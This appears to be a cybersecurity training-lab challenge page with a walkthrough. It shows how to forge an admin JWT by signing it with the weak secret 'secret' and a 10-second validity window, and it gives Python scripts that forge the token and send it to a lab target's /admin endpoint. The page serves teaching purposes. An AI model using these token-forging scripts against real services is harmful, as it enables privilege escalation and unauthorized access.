Step 1: Click on the green button to Start the Lab
Step 2: Hack the URL or IP of the lab
Step 3: Use your skills and logic to find the flags!
This challenge requires manipulating JWT claims while respecting strict time constraints. You must create a valid JWT with admin privileges where the token validity window (exp - iat) does not exceed 10 seconds, and the token must be valid at the current time.
<target-ip>
{"alg": "HS256", "typ": "JWT"}
{"sub": "user123", "role": "user", "iat": [timestamp], "exp": [timestamp + 3600]}
For this daily challenge, the JWT secret is intentionally weak for educational purposes. Try common weak secrets:
You'll need Python with the PyJWT library to manipulate JWT tokens:
# Install PyJWT library
pip install PyJWT
# Verify installation
python -c "import jwt; print('JWT library ready')"
Create a Python script to generate a valid admin JWT with proper time constraints:
#!/usr/bin/env python3
import jwt
import time
# JWT secret (discovered from weak password testing)
secret = "secret"
# Get current timestamp for precise timing
current_time = int(time.time())
# Create admin payload with 10-second validity window
payload = {
"sub": "user123", # Keep original subject
"role": "admin", # CHANGE: user → admin
"iat": current_time, # CHANGE: issued now
"exp": current_time + 10 # CHANGE: expires in 10 seconds
}
# Generate properly signed JWT
admin_jwt = jwt.encode(payload, secret, algorithm="HS256")
print(f"Generated Admin JWT:")
print(admin_jwt)
print(f"\nToken valid from {current_time} to {current_time + 10}")
print(f"Current time: {int(time.time())}")
print(f"\nQuickly paste this token into the challenge!")
If the attack is successful, you'll see:
This message indicates you've successfully manipulated the JWT claims and bypassed the authentication system!
For even faster execution, create an automated script that generates and tests the token:
#!/usr/bin/env python3
import jwt
import time
import requests
secret = "secret"
target_url = "http://<target-ip>"
current_time = int(time.time())
payload = {
"sub": "user123",
"role": "admin",
"iat": current_time,
"exp": current_time + 10
}
admin_jwt = jwt.encode(payload, secret, algorithm="HS256")
# Immediately test the token
response = requests.get(f"{target_url}/admin",
headers={"Authorization": f"Bearer {admin_jwt}"})
if response.status_code == 200:
print("SUCCESS! Admin access granted!")
print(response.json())
else:
print(f"Failed: {response.json()}")
This challenge demonstrates how weak JWT secrets combined with claims manipulation can lead to privilege escalation. The time constraint adds realism, simulating scenarios where tokens have short validity periods. Understanding these vulnerabilities helps developers implement more secure JWT-based authentication systems.
Sign-in to your account to access your hacking courses and cyber security labs.
Access all hacking courses and cyber security labs.